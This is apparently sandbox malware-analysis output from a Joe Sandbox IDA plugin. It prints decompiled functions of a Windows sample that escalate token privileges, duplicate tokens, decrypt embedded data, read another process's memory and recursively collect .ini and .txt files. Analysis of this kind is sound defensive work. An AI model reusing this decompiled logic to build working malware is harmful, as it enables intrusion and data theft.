                          							_t303 = _t303 + 4;
                          						}
                          						_t183 =  *(_t286 + 0x10);
                          						if( *(_t286 + 0x10) != 0) {
                          							E005C91E0(_t183);
                          							_t303 = _t303 + 4;
                          						}
                          						_t184 =  *((intOrPtr*)(_t286 + 0xc));
                          						if( *((intOrPtr*)(_t286 + 0xc)) != 0) {
                          							E005C91E0(_t184);
                          							_t303 = _t303 + 4;
                          						}
                          						E005C91E0(_t286);
                          					}
                          					goto L79;
                          				}
                          			}

                          • Instruction addresses: the decompiled lines above cover 0x005d1a7d to 0x005d1f4d (the per-line address column of the side-by-side view is collapsed here because it no longer lines up with the C-code).

                          APIs
                          • lstrcmpiW.KERNEL32(?,?,00000014,0000000C), ref: 005D1BFA
                          • lstrcmpiW.KERNEL32(?,?), ref: 005D1C15
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • lstrcmpiW.KERNEL32(?,?), ref: 005D1C40
                          • lstrcmpiW.KERNEL32(?,?), ref: 005D1C60
                          • lstrcmpiW.KERNEL32(?,?), ref: 005D1C7B
                          • lstrcmpiW.KERNEL32(?,?), ref: 005D1CB4
                          • CreateThread.KERNEL32(00000000,00000000,005D13A0,?,00000000,?), ref: 005D1E4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: lstrcmpi$Heap$AllocateCreateProcessThread
                          • String ID: D
                          • API String ID: 4198123405-2746444292
                          • Opcode ID: 316f8c3741a418b80612529a1e4a06a6d0f8d88e3cd46e014a94c88674296b2a
                          • Instruction ID: 6b3a51f26001f8a35e192b16cf2703cd98ce4582c1a1f1a5349f86a01ef79f5a
                          • Opcode Fuzzy Hash: 316f8c3741a418b80612529a1e4a06a6d0f8d88e3cd46e014a94c88674296b2a
                          • Instruction Fuzzy Hash: 1DE18FB4A04606AFD724DF29D885A2ABBE9FF84344F04882FE845C7351EB31ED15CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 54%
                          			E005C8CD0(void* __ecx) {
                          				void** _v12;
                          				char _v204;
                          				struct _LUID _v216;
                          				char _v220;
                          				struct _TOKEN_PRIVILEGES _v236;
                          				long _v240;
                          				int _v244;
                          				char _v248;
                          				void* _v252;
                          				void* _v256;
                          				int _v260;
                          				void* _v268;
                          				intOrPtr _v276;
                          				intOrPtr* _t29;
                          				intOrPtr* _t30;
                          				void* _t31;
                          				intOrPtr _t34;
                          				void* _t43;
                          				intOrPtr* _t44;
                          				struct _TOKEN_PRIVILEGES* _t49;
                          				intOrPtr* _t58;
                          				void* _t62;
                          				intOrPtr _t64;
                          				WCHAR* _t68;
                          				HANDLE* _t69;
                          				intOrPtr _t71;
                          
                          				_t69 =  &_v256;
                          				_v252 = 0xffffffff;
                          				_t71 =  *0x5d9c00; // 0x0
                          				_v244 = 0;
                          				_v256 = 0;
                          				_v248 = 0;
                          				_v260 = 0;
                          				if(_t71 != 0) {
                          					L2:
                          					_v240 = 0;
                          					if(OpenProcessToken(GetCurrentProcess(), 0x28, _t69) != 0) {
                          						_t68 =  &_v204;
                          						E005D4520(_t68, 0x5f);
                          						if(LookupPrivilegeValueW(0, _t68,  &_v216) != 0) {
                          							_t49 =  &_v220;
                          							_t49->PrivilegeCount = 1;
                          							_t49->Privileges[0].Luid = 2;
                          							AdjustTokenPrivileges(_v260, 0, _t49, 0x10,  &_v236,  &_v240);
                          						}
                          					}
                          					_t29 =  *0x5d9c4c; // 0x0
                          					if(_t29 == 0) {
                          						L16:
                          						_t30 =  *0x5d9b80; // 0x0
                          						if(_t30 == 0) {
                          							L21:
                          							_t31 = _v260;
                          							if(_t31 == 0) {
                          								L23:
                          								return _t31;
                          							}
                          							AdjustTokenPrivileges(_t31, 0,  &_v236, 0x10, 0, 0);
                          							return CloseHandle(_v260);
                          						}
                          						_t34 =  *_t30();
                          						_t64 = _t34;
                          						if(_t34 == 0xffffffff) {
                          							goto L21;
                          						}
                          						L18:
                          						RevertToSelf();
                          						_push( &_v252);
                          						_push(_t64);
                          						if( *0x5d9c00() != 0 && DuplicateTokenEx(_v260, 0x2000000, 0, 1, 1,  &_v252) != 0) {
                          							CloseHandle(_v268);
                          							 *_v12 = _v260;
                          						}
                          						goto L21;
                          					}
                          					_push( &_v248);
                          					_push( &_v256);
                          					_push(1);
                          					_push(0);
                          					_push(0);
                          					if( *_t29() == 0) {
                          						goto L16;
                          					}
                          					_t43 = _v268;
                          					_t64 = 0xffffffffffffffff;
                          					if(_t43 == 0) {
                          						L13:
                          						_t44 =  *0x5d9be8; // 0x0
                          						if(_t44 != 0) {
                          							 *_t44(_v276);
                          						}
                          						if(_t64 != 0xffffffff) {
                          							goto L18;
                          						} else {
                          							goto L16;
                          						}
                          					}
                          					_t62 = 0;
                          					_t58 = _v276 + 8;
                          					while( *_t58 != 0) {
                          						_t62 = _t62 + 1;
                          						_t58 = _t58 + 0xc;
                          						if(_t62 < _t43) {
                          							continue;
                          						}
                          						goto L13;
                          					}
                          					_t64 =  *((intOrPtr*)(_t58 - 8));
                          					goto L13;
                          				}
                          				_t31 = E005D18C0(__ecx, _t71);
                          				if(_t31 == 0) {
                          					goto L23;
                          				}
                          				goto L2;
                          			}

                          • Instruction addresses: the decompiled lines above cover 0x005c8cd1 to 0x005c8e4f (the per-line address column of the side-by-side view is collapsed here because it no longer lines up with the C-code).

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 005C8D0D
                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005C8D19
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005C8D3A
                          • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 005C8D68
                          • RevertToSelf.ADVAPI32 ref: 005C8DD9
                          • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 005C8E04
                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 005C8E19
                            • Part of subcall function 005D18C0: LoadLibraryW.KERNEL32(?), ref: 005D18DC
                            • Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D18FD
                            • Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1911
                            • Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1925
                            • Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1939
                          • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,00000000,00000000), ref: 005C8E39
                          • CloseHandle.KERNEL32 ref: 005C8E42
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: AddressProcToken$AdjustCloseHandlePrivilegesProcess$CurrentDuplicateLibraryLoadLookupOpenPrivilegeRevertSelfValue
                          • String ID:
                          • API String ID: 1504140195-0
                          • Opcode ID: ed03c699aac614b8f99cc0771f81a25622e9d6faf849906da5bcc6383703a46e
                          • Instruction ID: df533087ae5aedc7693bca5133c9e74305284a1243d5f273339a8b3e416d2a1f
                          • Opcode Fuzzy Hash: ed03c699aac614b8f99cc0771f81a25622e9d6faf849906da5bcc6383703a46e
                          • Instruction Fuzzy Hash: 92411970205202AFE724DF64DC49FAA7BE8FB94750F04491EB496D61E0EBB0D848DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E005D5AB0(intOrPtr* _a4) {
                          				BYTE* _v0;
                          				intOrPtr _v8;
                          				intOrPtr _v40;
                          				int _v64;
                          				char _v68;
                          				long* _v72;
                          				char _v80;
                          				long* _v88;
                          				intOrPtr _v92;
                          				char _v104;
                          				intOrPtr _v116;
                          				intOrPtr _v132;
                          				char _v144;
                          				long* _v148;
                          				intOrPtr* _t22;
                          				long* _t24;
                          				long* _t25;
                          				int* _t34;
                          				BYTE* _t37;
                          				DWORD* _t39;
                          				intOrPtr* _t42;
                          				char* _t43;
                          				long* _t46;
                          				int _t47;
                          				BYTE* _t49;
                          				HCRYPTKEY* _t51;
                          
                          				_t49 = 0;
                          				_t22 =  &_v68;
                          				 *_t22 = 0;
                          				 *_t51 = 0;
                          				_v72 = 0;
                          				_push(0xf0000000);
                          				_push(0x18);
                          				_push(0);
                          				_push(0);
                          				_push(_t22);
                          				if( *0x5d9e08() == 0) {
                          					_t46 = 0;
                          				} else {
                          					_t43 =  &_v68;
                          					 *((intOrPtr*)(_t43 - 0xc)) = 0x208;
                          					 *((intOrPtr*)(_t43 - 8)) = 0x6610;
                          					 *((intOrPtr*)(_t43 - 4)) = 0x20;
                          					E005CC400(_t43, _v8, 0x20);
                          					_t51 =  &(_t51[3]);
                          					if(CryptImportKey(_v88,  &_v80, 0x2c, 0, 1, _t51) == 0) {
                          						L7:
                          						_t46 = 0;
                          						goto L8;
                          					} else {
                          						_t34 =  &_v104;
                          						 *_t34 = 1;
                          						_push(0);
                          						_push(_t34);
                          						_push(4);
                          						_push(_v116);
                          						if( *0x5d9e10() == 0) {
                          							goto L7;
                          						} else {
                          							_push(0);
                          							_push(_v40);
                          							_push(1);
                          							_push(_v132);
                          							if( *0x5d9e10() == 0) {
                          								goto L7;
                          							} else {
                          								_t47 = _v64;
                          								_t37 = E005C3180(_t47, 0);
                          								_t51 =  &(_t51[2]);
                          								if(_t37 == 0) {
                          									goto L7;
                          								} else {
                          									_t49 = _t37;
                          									E005CC400(_t37, _v68, _t47);
                          									_t51 =  &(_t51[3]);
                          									_t39 =  &_v144;
                          									 *_t39 = _t47;
                          									_t46 = 0;
                          									if(CryptDecrypt(_v148, 0, 1, 0, _t49, _t39) == 0) {
                          										E005C91E0(_t49);
                          										_t51 =  &(_t51[1]);
                          										L8:
                          										_t49 = 0;
                          									} else {
                          										_t46 = 1;
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          				_t24 =  *_t51;
                          				if(_t24 != 0) {
                          					CryptDestroyKey(_t24);
                          				}
                          				_t25 = _v88;
                          				_t42 = _a4;
                          				if(_t25 != 0) {
                          					CryptReleaseContext(_t25, 0);
                          				}
                          				_v0 = _t49;
                          				 *_t42 = _v92;
                          				return _t46;
                          			}

                          0x005d5ab7
                          0x005d5ab9
                          0x005d5abd
                          0x005d5abf
                          0x005d5ac2
                          0x005d5ac6
                          0x005d5acb
                          0x005d5acd
                          0x005d5ace
                          0x005d5acf
                          0x005d5ad8
                          0x005d5ba0
                          0x005d5ade
                          0x005d5ae2
                          0x005d5aeb
                          0x005d5af2
                          0x005d5af9
                          0x005d5aff
                          0x005d5b04
                          0x005d5b21
                          0x005d5b9a
                          0x005d5b9a
                          0x00000000
                          0x005d5b23
                          0x005d5b23
                          0x005d5b27
                          0x005d5b2d
                          0x005d5b2f
                          0x005d5b30
                          0x005d5b32
                          0x005d5b3e
                          0x00000000
                          0x005d5b40
                          0x005d5b40
                          0x005d5b42
                          0x005d5b46
                          0x005d5b48
                          0x005d5b54
                          0x00000000
                          0x005d5b56
                          0x005d5b56
                          0x005d5b5d
                          0x005d5b62
                          0x005d5b67
                          0x00000000
                          0x005d5b69
                          0x005d5b69
                          0x005d5b71
                          0x005d5b76
                          0x005d5b79
                          0x005d5b7d
                          0x005d5b7f
                          0x005d5b93
                          0x005d5bdf
                          0x005d5be4
                          0x005d5b9c
                          0x005d5b9c
                          0x005d5b95
                          0x005d5b97
                          0x005d5b97
                          0x005d5b93
                          0x005d5b67
                          0x005d5b54
                          0x005d5b3e
                          0x005d5b21
                          0x005d5ba2
                          0x005d5ba7
                          0x005d5baa
                          0x005d5baa
                          0x005d5bb0
                          0x005d5bb4
                          0x005d5bbe
                          0x005d5bc3
                          0x005d5bc3
                          0x005d5bc9
                          0x005d5bd0
                          0x005d5bdb

                          APIs
                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,005D48B5,?,?,00000020,?,?,?,?,00000020), ref: 005D5AD0
                          • CryptImportKey.ADVAPI32(?,?,0000002C,00000000,00000001), ref: 005D5B19
                          • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 005D5B36
                          • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 005D5B4C
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?), ref: 005D5B8B
                          • CryptDestroyKey.ADVAPI32(00000000,?,?,?,00000020,?,?,00000020,?,?,?,?,?,00000002,00000000,00000002), ref: 005D5BAA
                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,00000020,?,?,00000020,?,?,?,?,?,00000002,00000000), ref: 005D5BC3
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Crypt$ContextHeapParam$AcquireAllocateDecryptDestroyImportProcessRelease
                          • String ID:
                          • API String ID: 2876648536-0
                          • Opcode ID: 710b6ada629d247a63ff83874d9170e9e97d695b1aa6f3cbb9f253a196cc0e18
                          • Instruction ID: 48a5f569959f2dcdca22e346f32b72ab776165f5111bb2b1bf52ddab2075a483
                          • Opcode Fuzzy Hash: 710b6ada629d247a63ff83874d9170e9e97d695b1aa6f3cbb9f253a196cc0e18
                          • Instruction Fuzzy Hash: 763168B1204300AFE7209F65DC49F6BBFA9FFC1B01F14881BB84696290E7B1D804DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005D1800(void* _a4) {
                          				intOrPtr _v236;
                          				long _v276;
                          				intOrPtr _v280;
                          				void _v340;
                          				void _v348;
                          				void* _v360;
                          				void* _v372;
                          				void _v380;
                          				void* _t25;
                          				DWORD* _t28;
                          				void* _t29;
                          				union _PROCESSINFOCLASS _t30;
                          				DWORD* _t32;
                          
                          				_t29 = _a4;
                          				_t30 = 0;
                          				if(NtQueryInformationProcess(_t29, 0,  &_v348, 0x18, 0) >= 0) {
                          					_t25 =  &_v276;
                          					 *_t25 = 0;
                          					if(ReadProcessMemory(_t29, _v360,  &_v380, 0x10, _t25) != 0 && _v276 == 0x10) {
                          						_v276 = 0;
                          						if(ReadProcessMemory(_t29, _v372,  &_v340, 0x40, _t25) != 0 && _v276 == 0x40) {
                          							_t28 = _t32;
                          							 *_t28 = 0;
                          							if(ReadProcessMemory(_t29, _v372 + _v280, _t25, 0xf8, _t28) != 0 &&  *_t32 == 0xf8) {
                          								_t30 = _v372 + _v236;
                          							}
                          						}
                          					}
                          				}
                          				return _t30;
                          			}

                          0x005d1809
                          0x005d1810
                          0x005d1824
                          0x005d182e
                          0x005d1836
                          0x005d184a
                          0x005d1857
                          0x005d1871
                          0x005d187e
                          0x005d1880
                          0x005d189b
                          0x005d18aa
                          0x005d18aa
                          0x005d189b
                          0x005d1871
                          0x005d184a
                          0x005d18bc

                          APIs
                          • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 005D181C
                          • ReadProcessMemory.KERNEL32(?,?,?,00000010,?), ref: 005D1842
                          • ReadProcessMemory.KERNEL32(?,?,?,00000040,?), ref: 005D1869
                          • ReadProcessMemory.KERNEL32(?,?,?,000000F8), ref: 005D1893
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Process$MemoryRead$InformationQuery
                          • String ID: @
                          • API String ID: 3059065599-2766056989
                          • Opcode ID: f4ed3c6d2504dcd494e9e80b4d8fb9d5a31babcae5a8fdb15a6dee73ceeec33b
                          • Instruction ID: 56feee89ca800fb2510035fcab92645b01a10421a54afe105a23163131d3baf9
                          • Opcode Fuzzy Hash: f4ed3c6d2504dcd494e9e80b4d8fb9d5a31babcae5a8fdb15a6dee73ceeec33b
                          • Instruction Fuzzy Hash: 2A114AB1204301AFE6308F14DD84FBB7BACEB91756F00851AB95496380D770AC05EB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E005D5710() {
                          				void* _t96;
                          				void** _t97;
                          				void* _t98;
                          				signed int _t99;
                          				void* _t101;
                          				signed char _t104;
                          				int _t106;
                          				void** _t112;
                          				signed short _t113;
                          				void* _t115;
                          				void* _t122;
                          				void* _t125;
                          				signed int _t127;
                          				signed int _t128;
                          				signed int _t129;
                          				signed int _t130;
                          				void* _t131;
                          				void* _t132;
                          				signed int _t133;
                          				void** _t134;
                          				intOrPtr* _t136;
                          				signed short* _t137;
                          				signed short* _t139;
                          				signed short* _t140;
                          				void** _t144;
                          				void* _t145;
                          				void* _t146;
                          				signed int _t147;
                          				void* _t148;
                          				void* _t151;
                          				void* _t153;
                          				void** _t154;
                          				void* _t155;
                          				signed int _t157;
                          				signed int _t158;
                          				signed int _t159;
                          				signed int _t160;
                          				signed int _t161;
                          				void* _t165;
                          				signed int _t168;
                          				signed int _t169;
                          				WCHAR* _t170;
                          				void* _t171;
                          				void** _t172;
                          				void** _t173;
                          
                          				_t155 = _t172[0x29e];
                          				_t96 = _t172[0x29d];
                          				_t146 = _t172[0x29c];
                          				_t131 = 0xfffffc00;
                          				while(1) {
                          					_t157 =  *(_t146 + _t131 + 0x400) & 0x0000ffff;
                          					if(_t157 == 0) {
                          						break;
                          					}
                          					 *(_t172 + _t131 + 0x65c) = _t157;
                          					_t131 = _t131 + 2;
                          					if(_t131 != 0) {
                          						continue;
                          					}
                          					 *((short*)(_t172 + _t131 + 0x65a)) = 0;
                          					L42:
                          					return 0;
                          				}
                          				 *(_t172 + _t131 + 0x65c) = 0;
                          				if(_t96 == 0) {
                          					L22:
                          					_t132 = 0x200;
                          					_t97 =  &(_t172[0x97]);
                          					while( *_t97 != 0) {
                          						_t97 =  &(_t97[0]);
                          						_t132 = _t132 - 1;
                          						if(_t132 != 0) {
                          							continue;
                          						}
                          						goto L42;
                          					}
                          					_t158 = 0;
                          					while(1) {
                          						_t147 = _t158;
                          						_t34 = _t158 + 0x5d9c1c; // 0x5c
                          						_t159 =  *(_t158 + _t34) & 0x0000ffff;
                          						if(_t159 == 0) {
                          							break;
                          						}
                          						 *(_t97 + _t147 * 2) = _t159;
                          						_t37 = _t147 + 1; // 0x1
                          						_t158 = _t37;
                          						if(_t132 != _t158) {
                          							continue;
                          						}
                          						 *(_t97 + _t147 * 2) = 0;
                          						goto L42;
                          					}
                          					 *(_t97 + _t147 * 2) = 0;
                          					_t98 = 0xfffffc00;
                          					while(1) {
                          						_t133 =  *(_t172 + _t98 + 0x65c) & 0x0000ffff;
                          						if(_t133 == 0) {
                          							break;
                          						}
                          						 *(_t172 + _t98 + 0xa5c) = _t133;
                          						_t98 = _t98 + 2;
                          						if(_t98 != 0) {
                          							continue;
                          						}
                          						 *((short*)(_t172 + _t98 + 0xa5a)) = 0;
                          						goto L42;
                          					}
                          					_t134 =  &(_t172[0x97]);
                          					_t148 = 0x200;
                          					 *(_t172 + _t98 + 0xa5c) = 0;
                          					while( *_t134 != 0) {
                          						_t134 =  &(_t134[0]);
                          						_t148 = _t148 - 1;
                          						if(_t148 != 0) {
                          							continue;
                          						}
                          						return 0;
                          					}
                          					_t160 = 0;
                          					while(1) {
                          						_t99 = _t160;
                          						_t52 = _t160 + 0x5d9ba4; // 0x2a005c
                          						_t161 =  *(_t160 + _t52) & 0x0000ffff;
                          						if(_t161 == 0) {
                          							break;
                          						}
                          						 *(_t134 + _t99 * 2) = _t161;
                          						_t55 = _t99 + 1; // 0x1
                          						_t160 = _t55;
                          						if(_t148 != _t160) {
                          							continue;
                          						}
                          						 *(_t134 + _t99 * 2) = 0;
                          						goto L42;
                          					}
                          					 *(_t134 + _t99 * 2) = 0;
                          					_t101 = FindFirstFileW( &(_t172[0x97]),  &(_t172[3]));
                          					 *_t172 = _t101;
                          					if(_t101 == 0xffffffff) {
                          						L75:
                          						return 1;
                          					}
                          					_t136 =  *0x5d9d94;
                          					_t170 =  &(_t172[0xe]);
                          					do {
                          						_t104 = _t172[3].dwFileAttributes;
                          						_t125 = 0;
                          						if((_t104 & 0x00000002) != 0) {
                          							goto L72;
                          						}
                          						if((_t104 & 0x00000010) != 0) {
                          							_push(0x5d9aa4);
                          							_push(_t170);
                          							if( *_t136() != 0 && lstrcmpiW(_t170, 0x5d9c3a) != 0) {
                          								_push(_t155);
                          								_push(_t170);
                          								_push( &(_t172[0x199]));
                          								E005D5710();
                          								_t172 =  &(_t172[3]);
                          							}
                          							L71:
                          							goto L72;
                          						}
                          						_t171 = 0;
                          						_t112 =  &(_t172[0xd]);
                          						while( *(_t172 + _t171 + 0x38) != 0) {
                          							_t171 = _t171 + 2;
                          							_t112 =  &(_t112[0]);
                          							if(_t171 != 0x400) {
                          								continue;
                          							}
                          							L55:
                          							_t125 = 0;
                          							goto L72;
                          						}
                          						_t137 = _t172 + _t171 + 0x36;
                          						_t125 = 0;
                          						if(_t137 <=  &(_t172[0xe])) {
                          							goto L72;
                          						}
                          						_t125 = 0;
                          						if(( *_t137 & 0x0000ffff) != 0x2e) {
                          							_t151 = 1;
                          							while(1) {
                          								_t165 = _t151;
                          								_t139 = _t112;
                          								if(_t139 <=  &(_t172[0xe])) {
                          									break;
                          								}
                          								_t89 = _t165 + 1; // 0x2
                          								_t151 = _t89;
                          								_t112 = _t139 - 2;
                          								if(( *_t139 & 0x0000ffff) != 0x2e) {
                          									continue;
                          								}
                          								break;
                          							}
                          							_t155 = _t172[0x29e];
                          							_t140 =  &(_t139[1]);
                          							L66:
                          							if(_t165 != 3) {
                          								goto L71;
                          							}
                          							_t113 =  *_t140;
                          							if(_t113 == 0x6e0069) {
                          								if(_t140[2] != 0x69) {
                          									goto L72;
                          								}
                          								L47:
                          								_t64 = _t171 + 2; // 0x2
                          								_t172[3].dwFileAttributes = _t64;
                          								_t115 = E005C3180(_t64, 0);
                          								_t172 =  &(_t172[2]);
                          								_t125 = 0;
                          								_t172[1] = _t115;
                          								if(_t115 == 0) {
                          									goto L72;
                          								}
                          								E005CC400(_t115,  &(_t172[0xf]), _t172[2]);
                          								_t173 =  &(_t172[3]);
                          								 *((short*)(_t173[1] + _t171)) = 0;
                          								E005C1200( *_t155,  &(_t173[1]));
                          								E005D7410( &(_t173[0x199]),  &(_t172[0xf]), _t155);
                          								_t172 =  &(_t173[3]);
                          								_t122 = E005CC430( *((intOrPtr*)(_t155 + 8)));
                          								_t125 = 1;
                          								if(_t122 > 0x10000) {
                          									goto L72;
                          								}
                          								Sleep(0x64);
                          								goto L55;
                          							}
                          							if(_t113 != 0x780074) {
                          								goto L72;
                          							}
                          							if(_t140[2] == 0x74) {
                          								goto L47;
                          							}
                          							goto L72;
                          						}
                          						_t140 = _t172 + _t171 + 0x38;
                          						_t165 = 0;
                          						goto L66;
                          						L72:
                          						_t106 = FindNextFileW(_t172[1],  &(_t172[3]));
                          						_t136 =  *0x5d9d94;
                          						_t170 =  &(_t172[0xe]);
                          					} while (_t125 == 0 && _t106 != 0);
                          					FindClose( *_t172);
                          					goto L75;
                          				}
                          				_t153 = 0x200;
                          				_t144 =  &(_t172[0x97]);
                          				while( *_t144 != 0) {
                          					_t144 =  &(_t144[0]);
                          					_t153 = _t153 - 1;
                          					if(_t153 != 0) {
                          						continue;
                          					}
                          					goto L42;
                          				}
                          				_t127 = 0;
                          				while(1) {
                          					_t168 = _t127;
                          					_t14 = _t127 + 0x5d9c1c; // 0x5c
                          					_t128 =  *(_t127 + _t14) & 0x0000ffff;
                          					if(_t128 == 0) {
                          						break;
                          					}
                          					 *(_t144 + _t168 * 2) = _t128;
                          					_t17 = _t168 + 1; // 0x1
                          					_t127 = _t17;
                          					if(_t153 != _t127) {
                          						continue;
                          					}
                          					 *(_t144 + _t168 * 2) = 0;
                          					goto L42;
                          				}
                          				 *(_t144 + _t168 * 2) = 0;
                          				_t154 =  &(_t172[0x97]);
                          				_t145 = 0x200;
                          				while( *_t154 != 0) {
                          					_t154 =  &(_t154[0]);
                          					_t145 = _t145 - 1;
                          					if(_t145 != 0) {
                          						continue;
                          					}
                          					goto L42;
                          				}
                          				_t129 = 0;
                          				while(1) {
                          					_t169 = _t129;
                          					_t130 =  *(_t96 + _t129 * 2) & 0x0000ffff;
                          					if(_t130 == 0) {
                          						break;
                          					}
                          					 *(_t154 + _t169 * 2) = _t130;
                          					_t27 = _t169 + 1; // 0x1
                          					_t129 = _t27;
                          					if(_t145 != _t129) {
                          						continue;
                          					}
                          					 *(_t154 + _t169 * 2) = 0;
                          					goto L42;
                          				}
                          				 *(_t154 + _t169 * 2) = 0;
                          				goto L22;
                          			}

                          0x005d571a
                          0x005d5721
                          0x005d5728
                          0x005d572f
                          0x005d5734
                          0x005d5734
                          0x005d573f
                          0x00000000
                          0x00000000
                          0x005d5741
                          0x005d5749
                          0x005d574c
                          0x00000000
                          0x00000000
                          0x005d574e
                          0x005d58b9
                          0x00000000
                          0x005d58b9
                          0x005d575f
                          0x005d5769
                          0x005d57ff
                          0x005d57ff
                          0x005d5804
                          0x005d580b
                          0x005d5811
                          0x005d5814
                          0x005d5815
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005d5817
                          0x005d581c
                          0x005d581e
                          0x005d581e
                          0x005d5820
                          0x005d5820
                          0x005d582b
                          0x00000000
                          0x00000000
                          0x005d582d
                          0x005d5831
                          0x005d5831
                          0x005d5836
                          0x00000000
                          0x00000000
                          0x005d5838
                          0x00000000
                          0x005d5838
                          0x005d5840
                          0x005d5846
                          0x005d584b
                          0x005d584b
                          0x005d5856
                          0x00000000
                          0x00000000
                          0x005d5858
                          0x005d5860
                          0x005d5863
                          0x00000000
                          0x00000000
                          0x005d5865
                          0x00000000
                          0x005d5865
                          0x005d5871
                          0x005d5878
                          0x005d587d
                          0x005d5887
                          0x005d588d
                          0x005d5892
                          0x005d5893
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005d5893
                          0x005d5897
                          0x005d5899
                          0x005d5899
                          0x005d589b
                          0x005d589b
                          0x005d58a6
                          0x00000000
                          0x00000000
                          0x005d58a8
                          0x005d58ac
                          0x005d58ac
                          0x005d58b1
                          0x00000000
                          0x00000000
                          0x005d58b3
                          0x00000000
                          0x005d58b3
                          0x005d58c6
                          0x005d58d9
                          0x005d58e2
                          0x005d58e5
                          0x005d5a9b
                          0x00000000
                          0x005d5a9d
                          0x005d58eb
                          0x005d58f7
                          0x005d598e
                          0x005d598e
                          0x005d5992
                          0x005d5996
                          0x00000000
                          0x00000000
                          0x005d599e
                          0x005d59c3
                          0x005d59c8
                          0x005d59cf
                          0x005d59e5
                          0x005d59e6
                          0x005d59ee
                          0x005d59ef
                          0x005d59f4
                          0x005d59f4
                          0x005d5a6b
                          0x00000000
                          0x005d5a6b
                          0x005d59a0
                          0x005d59a2
                          0x005d59a6
                          0x005d59ae
                          0x005d59b1
                          0x005d59ba
                          0x00000000
                          0x00000000
                          0x005d59bc
                          0x005d59bc
                          0x00000000
                          0x005d59bc
                          0x005d59f9
                          0x005d5a01
                          0x005d5a05
                          0x00000000
                          0x00000000
                          0x005d5a0a
                          0x005d5a0f
                          0x005d5a1b
                          0x005d5a1c
                          0x005d5a1c
                          0x005d5a1e
                          0x005d5a26
                          0x00000000
                          0x00000000
                          0x005d5a2b
                          0x005d5a2b
                          0x005d5a2e
                          0x005d5a34
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005d5a34
                          0x005d5a36
                          0x005d5a3d
                          0x005d5a40
                          0x005d5a43
                          0x00000000
                          0x00000000
                          0x005d5a45
                          0x005d5a4c
                          0x005d590a
                          0x00000000
                          0x00000000
                          0x005d5910
                          0x005d5910
                          0x005d5915
                          0x005d591a
                          0x005d591f
                          0x005d5922
                          0x005d5926
                          0x005d592a
                          0x00000000
                          0x00000000
                          0x005d593c
                          0x005d5941
                          0x005d5948
                          0x005d5955
                          0x005d5964
                          0x005d5969
                          0x005d596f
                          0x005d5979
                          0x005d597e
                          0x00000000
                          0x00000000
                          0x005d5986
                          0x00000000
                          0x005d5986
                          0x005d5a5d
